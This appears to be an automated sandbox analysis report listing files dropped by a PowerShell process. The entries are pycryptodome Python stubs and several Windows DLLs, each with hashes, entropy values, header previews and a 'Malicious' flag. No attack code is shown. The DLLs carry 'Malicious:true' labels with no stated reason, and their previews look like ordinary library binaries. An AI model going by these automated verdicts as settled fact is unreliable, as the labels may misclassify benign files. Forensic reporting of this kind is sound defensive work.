                                                                                                                                                                                                              Preview:from types import ModuleType..from typing import Union, Any, Optional, Tuple, Dict, overload....Buffer = Union[bytes, bytearray, memoryview]....class OcbMode(object):.. block_size: int.. nonce: Buffer.... def __init__(self,.. factory: ModuleType,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> OcbMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None:
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10511
                                                                                                                                                                                                              Entropy (8bit):4.49013114589532
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:dLFQHvoPoxi4mILd52ALFxKiDqwG4rW9ytU4p2EVQ577BqotU4SputAVsqW1vYhH:d5QHv/XwADKKqO6+U46Q2U4c3avgQO
                                                                                                                                                                                                              MD5:D68B4824ACBEA8EBF1EAB4F82138CF3E
                                                                                                                                                                                                              SHA1:FB8364761301477406B8301FA045B0630CFCBD85
                                                                                                                                                                                                              SHA-256:A86D0ACFABADF852EF126484A267A6C3953AF68FD17E6FCE496C4D2DFC9BCFE7
                                                                                                                                                                                                              SHA-512:62EA09E54240F0E7D6296B397044B8D7ACDFD7578BAE2E0C2A3F4E6AC400CA949BA772EFD969FFBB7820CBCE6D4EA1B5E4934526B2BA7DA5655576109CFCE10F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ofb.py : OFB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):720
                                                                                                                                                                                                              Entropy (8bit):4.737448172448685
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1REYBw1k1Jal9lvIY3FDXHo2JRyU1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REPZjT3pHo2NAY4nRNne3yFnR3Fne38
                                                                                                                                                                                                              MD5:8E7443C03B74A4BB74BBBCF7A93282A7
                                                                                                                                                                                                              SHA1:7A9C908B9D698278E5561A45A024C8DDF53CF304
                                                                                                                                                                                                              SHA-256:D1B1A685ABE48604348DA3AE3C54BAF54ED0BD5CC9F0CB93867A82F8877F9ECF
                                                                                                                                                                                                              SHA-512:F9580522EE9EE5F223E8D43F8E61D5CE054D9E1B4F361AD2B6C9DE9CAFCF95BECF8DF21D0B5CDECF59CEA2808F01D0952CD34A4F54B354F506CCA6D971E1F6C5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OfbMode']....class OfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7267
                                                                                                                                                                                                              Entropy (8bit):4.832814329763117
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/ItB4RK0tUU4cp/6U41k2T:0rskrs9VqeJ0tUTccT7
                                                                                                                                                                                                              MD5:EA825091932B4CFC4F055F098A96940A
                                                                                                                                                                                                              SHA1:1E5BB37CD61FDC47A24F32EE9DEE5B4E277C6237
                                                                                                                                                                                                              SHA-256:46650BB1BB4A35EE304ABAC23817A48704BABE4F93ECEC4CE62EE97D49C44189
                                                                                                                                                                                                              SHA-512:F851F5A70C5E4BE206849496C16FABEA11CEE30839A618AAA98EF3177E8C48946E8C4FB7DFDD1AF90889D6470C1A4983FDAA7CB887BDC125170C8AB3DC3F60E2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):576
                                                                                                                                                                                                              Entropy (8bit):4.621504702467695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:1Ro8s7REYB6IvIY3FDUCpu8RypqIY3fmIY3fm1Ap/ILFq6R5wnFq6R5j:1RM7C8T3SCpTB3632A9KnReFnRN
                                                                                                                                                                                                              MD5:C1EADE4DE0796F8C003DBB655E410274
                                                                                                                                                                                                              SHA1:283080AEFA8D7F00772CE108277688D55519EF46
                                                                                                                                                                                                              SHA-256:5E1521B1EA98D146374597A94FF5DF82FBE49F7C3DC06F6DB03379E1EA79D7E5
                                                                                                                                                                                                              SHA-512:3D2601FFBB3EC84FDEF28FBF4F409CBBF60D220B394D256FD13728EF5F0CC587FC2EDB00C868C10EEF7E0303508949D79DC23F3998E5CE2D4942A2A625BFC676
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OpenPgpMode']....class OpenPgpMode(object):.. block_size: int.. iv: Union[bytes, bytearray, memoryview].. IV: Union[bytes, bytearray, memoryview].. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. iv: Buffer,.. cipher_params: Dict) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: .......
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14401
                                                                                                                                                                                                              Entropy (8bit):4.7888171324327855
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/Iq1IzSsGJ+KLk3eNVkrEPHAZsLzL64giVRWcuL4oozD1o0Bk+Y:0rskrs9VqL1pXNVkrEPH6MXWiXWWtlUX
                                                                                                                                                                                                              MD5:C8E42C50AB65ABF0D6E88B569F0F6B40
                                                                                                                                                                                                              SHA1:C55881BB21674E493219FE0612A37BB62085DA9D
                                                                                                                                                                                                              SHA-256:7610B08153895261645F469F4FB7D2D5211D86CBE7F46D27E49CBB1BA4EC5F94
                                                                                                                                                                                                              SHA-512:31243C06C0457500389152092114C84AA3BCF042C63213BECA53FD2E920E05427A4CC4B330CAA7FE44C6CB7506D08BFEF9ADDFA04320E10820723F578253F876
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1299
                                                                                                                                                                                                              Entropy (8bit):4.379657025743841
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RM7ClDTglT3RzEA9unReFnR7PtWLn8no0E+XW3oIQ:cSklORuWLn8nlEF49
                                                                                                                                                                                                              MD5:FB584A8E53BC1B138B3932BDF16901D5
                                                                                                                                                                                                              SHA1:CF4F2426C15F17BD613A304B3E7F19A181E2035E
                                                                                                                                                                                                              SHA-256:80DAE2A187B04F2E3729BCDF78DE0DB31E22CA0922AD420F65077C448F1538E5
                                                                                                                                                                                                              SHA-512:05D214D0B39CA5566EA833772207D823AF350AEDDAF4A76C9569024D2A374D48FC48A0729B226A1A934E7CA179A5130ABB4232D3412BA27C9DA3DB214A9358BA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from types import ModuleType..from typing import Union, Tuple, Dict, Optional, overload....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['SivMode']....class SivMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. kwargs: Dict) -> None: ..... .. def update(self, component: Buffer) -> SivMode: ....... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ....... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer) -> Tuple[bytes, bytes]: ..... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13824
                                                                                                                                                                                                              Entropy (8bit):5.236611028290556
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:osiHXqpoUol3xZhRyQX5lDnRDFFav+tcqgRvE:K6D+XBDfDgRvE
                                                                                                                                                                                                              MD5:7FA5B1642D52FABFE1D3EBD1080056D4
                                                                                                                                                                                                              SHA1:56B9E87D613EE9A8B6B71A93ED5FA1603886139A
                                                                                                                                                                                                              SHA-256:88C7EC96B9E1D168005B3A8727AAA7F76B4B2985083ED7A9FB0A2AB02446E963
                                                                                                                                                                                                              SHA-512:9E0BF47060A2B7AC8FFD2CB8B845D44013C068BFE74926A67496D79BCB513506625BDA1DDF18ECE7777D1379F036506F19457D0A43FA618A8F75664C47798E64
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...R...*...U...*..R...*...*...*...U...*...U...*...U...*.....*.....*...}..*.....*..Rich.*..........................PE..d...N..e.........." ...%............P.....................................................`..........................................9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......,..............@....pdata..|....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1873
                                                                                                                                                                                                              Entropy (8bit):3.3740616367097997
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1ddPqzseQpoe/HMaDOP4PTpegUgygBVEp5KC:7dWszoG6+hBVEmC
                                                                                                                                                                                                              MD5:B73C5134DD8AB0FAEBDCED745FB10E33
                                                                                                                                                                                                              SHA1:17EB54897E236C78E2359D01E3179C25C12C5BD1
                                                                                                                                                                                                              SHA-256:CD2D0A19763488D875F8F986A9711DD0EEC9CFEF663556A21F9393489ED4CC9C
                                                                                                                                                                                                              SHA-512:2E3DF1902C064830986D00D17850F1D70097ECCF6E299E65C7BAAAD784DF1DC774B168E67A9B5EA6F7562A2DE9CE3C22465F5ABE2C5CCAE09313C8F89EDA33A3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from Cryptodome.Util._raw_api import (load_pycryptodome_raw_lib, c_size_t,.. c_uint8_ptr)......_raw_pkcs1_decode = load_pycryptodome_raw_lib("Cryptodome.Cipher._pkcs1_decode",.. """.. int pkcs1_decode(const uint8_t *em, size_t len_em,.. const uint8_t *sentinel, size_t len_sentinel,.. size_t expected_pt_len,.. uint8_t *output);.... int oaep_decode(const uint8_t *em,.. size_t em_len,.. const uint8_t *lHash,.. size_t hLen,.. const uint8_t *db,.. size_t db_len);.. """)......def pkcs1_decode(em, sentinel, expected_pt_len, output):.. if len(em) != len(outpu
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):36352
                                                                                                                                                                                                              Entropy (8bit):6.558039926510444
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Dz5P+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuTLg46:DzdqWB7YJlmLJ3oD/S4j990th9VTsC
                                                                                                                                                                                                              MD5:E63FC8375E1D8C47FBB84733F38A9552
                                                                                                                                                                                                              SHA1:995C32515AA183DA58F970CEDC6667FAE166615A
                                                                                                                                                                                                              SHA-256:F47F9C559A9C642DA443896B5CD24DE74FED713BDF6A9CD0D20F5217E4124540
                                                                                                                                                                                                              SHA-512:4213189F619E7AA71934033CABA401FE93801B334BA8D8EAFEDA89F19B13224C516E4BB4F4F93F6AE2C21CD8F5586D3FFAC3D16CB1242183B9302A1F408F6F6A
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d...L..e.........." ...%.H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):15872
                                                                                                                                                                                                              Entropy (8bit):5.285246086368036
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:jJBjJHEkEPYi3Xd+dc26E4++yuqAyXW9wifD4mqccqgwYUMvEW:ZkRwi3wO26Ef+yuIm9PfDewgwYUMvE
                                                                                                                                                                                                              MD5:A914F3D22DA22F099CB0FBFBBB75DDBF
                                                                                                                                                                                                              SHA1:2834AEB657CA301D722D6D4D1672239C83BE97E3
                                                                                                                                                                                                              SHA-256:4B4DBF841EC939EF9CC4B4F1B1BA436941A3F2AF2F4E34F82C568DFC09BA0358
                                                                                                                                                                                                              SHA-512:15BF5FCE53FB2C524054D02C2E48E3DDC4EAC0C1F73325D58B04DFE17259C208FFAC0A7C634FBC2CF1A08E7F28C1FD456061BA0838F4316EB37514E1E8D4C95F
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........TX..:...:...:.....:..;...:...;...:...;...:..?...:..>...:..9...:..R2...:..R:...:..R....:..R8...:.Rich..:.................PE..d...L..e.........." ...%. ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text...h........ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                              Entropy (8bit):5.505232918566824
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9d9VkyQ5f8vjVaCHpKpTTjaNe7oca2DWZQ2dhmdcqgwNeecBih:rkP5cjIGpKlqD2DakzgwNeE
                                                                                                                                                                                                              MD5:9F1A2A9D731E7755EE93C82C91FA5FE2
                                                                                                                                                                                                              SHA1:41085FBE84E1B98A795871033034FA1F186274EF
                                                                                                                                                                                                              SHA-256:17F3EAF463868B015583BD611BE5251E36AAB616522FF4072011B3D72F6F552F
                                                                                                                                                                                                              SHA-512:7E29D4729837D87AEF34CFA7B1F86DFBB81907CD11FC575C4ED1B8A956409492315BFA76ADE4D7C51E51E37E5D098A7F4FEE4C58D86D0E6245A4AA0D392D488A
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...L..e.........." ...%."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20992
                                                                                                                                                                                                              Entropy (8bit):6.061115794354147
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:pUv5cJMOZA0nmwBD+XpJgLa0Mp8QHg4P2llyM:GK1XBD+DgLa1gTi
                                                                                                                                                                                                              MD5:883DE82B3B17F95735F579E78A19D509
                                                                                                                                                                                                              SHA1:3EC7259ACA3730B2A6F4E1CA5121DB4AB41C619E
                                                                                                                                                                                                              SHA-256:67FF6C8BBDC9E33B027D53A26DF39BA2A2AD630ACCE1BAC0B0583CA31ADF914F
                                                                                                                                                                                                              SHA-512:602915EAA0933F5D1A26ECC1C32A8367D329B12794CBF2E435B1704E548858E64710AB52BC6FC14FC98DF0B8EEBDE2B32A35BCF935079CC8E2412C07DF5303FD
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...L..e.........." ...%.$...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text....".......$.................. ..`.rdata..L....@... ...(..............@..@.data...8....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..4............P..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25088
                                                                                                                                                                                                              Entropy (8bit):6.475398255636883
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Zc6HLZiMDFuGu+XHZXmrfXA+UA10ol31tuXy7IYgLWi:q6H1TZXX5XmrXA+NNxWi0dLWi
                                                                                                                                                                                                              MD5:0AC22DA9F0B2F84DE9D2B50D457020C1
                                                                                                                                                                                                              SHA1:682E316AE958121D0E704CAB0F78CCAD42C77573
                                                                                                                                                                                                              SHA-256:480C79C713AD15328E9EB9F064B90BCDCB5AAD149236679F97B61218F6D2D200
                                                                                                                                                                                                              SHA-512:11C04D55C5E73583D658E0918BD5A37C7585837A6E0F3C78AEF10A5D7A5C848B0620028177A9D9B0AD5DB882B2A26624F92BEFC9BC8F8A23C002723E50DD80A5
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...M..e.........." ...%.$...@............................................................`.........................................@i.......i..d...............................4....b...............................a..@............@...............................text....#.......$.................. ..`.rdata.......@...0...(..............@..@.data...8....p.......X..............@....pdata...............Z..............@..@.rsrc................^..............@..@.reloc..4............`..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.839420412830416
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:CF/1nb2mhQtkr+juOxKbDbRHcqgYvEkrK:42f6iuOsbDXgYvEmK
                                                                                                                                                                                                              MD5:6840F030DF557B08363C3E96F5DF3387
                                                                                                                                                                                                              SHA1:793A8BA0A7BDB5B7E510FC9A9DDE62B795F369AE
                                                                                                                                                                                                              SHA-256:B7160ED222D56925E5B2E247F0070D5D997701E8E239EC7F80BCE21D14FA5816
                                                                                                                                                                                                              SHA-512:EDF5A4D5A3BFB82CC140CE6CE6E9DF3C8ED495603DCF9C0D754F92F265F2DCE6A83F244E0087309B42930D040BF55E66F34504DC1C482A274AD8262AA37D1467
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d...N..e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13824
                                                                                                                                                                                                              Entropy (8bit):4.905258571193623
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:fRgPX8lvI+KnwSDTPUDEnKWPXcqgzQkvEd:4og9rUD/mpgzQkvE
                                                                                                                                                                                                              MD5:7256877DD2B76D8C6D6910808222ACD8
                                                                                                                                                                                                              SHA1:C6468DB06C4243CE398BEB83422858B3FED76E99
                                                                                                                                                                                                              SHA-256:DBF703293CFF0446DFD15BBAEDA52FB044F56A353DDA3BECA9AADD8A959C5798
                                                                                                                                                                                                              SHA-512:A14D460D96845984F052A8509E8FC44439B616EEAE46486DF20F21CCAA8CFB1E55F1E4FA2F11A7B6AB0A481DE62636CEF19EB5BEF2591FE83D415D67EB605B8E
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d...N..e.........." ...%..... ......P.....................................................`..........................................9.......9..d....`.......P..d............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                              Entropy (8bit):5.300728193650235
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:jGYJ1gSHxKkwv0i8XSi3Sm57NEEE/qexUEtDr6krRcqgUF6+6vEX:jR01si8XSi3SACqe7tDlDgUUjvE
                                                                                                                                                                                                              MD5:B063D73E5AA501060C303CAFBC72DAD3
                                                                                                                                                                                                              SHA1:8C1CA04A8ED34252EB233C993DDBA17803E0B81E
                                                                                                                                                                                                              SHA-256:98BACA99834DE65FC29EFA930CD9DBA8DA233B4CFDFC4AB792E1871649B2FE5C
                                                                                                                                                                                                              SHA-512:8C9AD249F624BDF52A3C789C32532A51D3CC355646BD725553A738C4491EA483857032FB20C71FD3698D7F68294E3C35816421DFF263D284019A9A4774C3AF05
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K,..*B..*B..*B..R...*B..UC..*B.RC..*B..*C..*B..UG..*B..UF..*B..UA..*B..J..*B..B..*B....*B..@..*B.Rich.*B.........................PE..d...O..e.........." ...%..... ......P.....................................................`..........................................9......x:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):57856
                                                                                                                                                                                                              Entropy (8bit):4.260136375669177
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:9RUqVT1dZ/GHkJnYcZiGKdZHDLtiduprZvZY0JAIg+v:9rHGHfJidIK
                                                                                                                                                                                                              MD5:3AEA5302F7F03EDEFF49D1C119C61693
                                                                                                                                                                                                              SHA1:DBDDE1C10B253744153FC1F47C078AAACCF3F3A6
                                                                                                                                                                                                              SHA-256:E5DDA67D4DF47B7F00FF17BE6541CA80BDB4B60E1F6FD1A7D7F115DDF7683EE5
                                                                                                                                                                                                              SHA-512:DD42C24EDAF7E1B25A51BC8C96447496B3289C612C395CA7BD8BF60A162229C2E0CA0432CDDF1CB2D65D80189DB02BEE42FFD0E7DD9E5FC19278CA3FD593AB2C
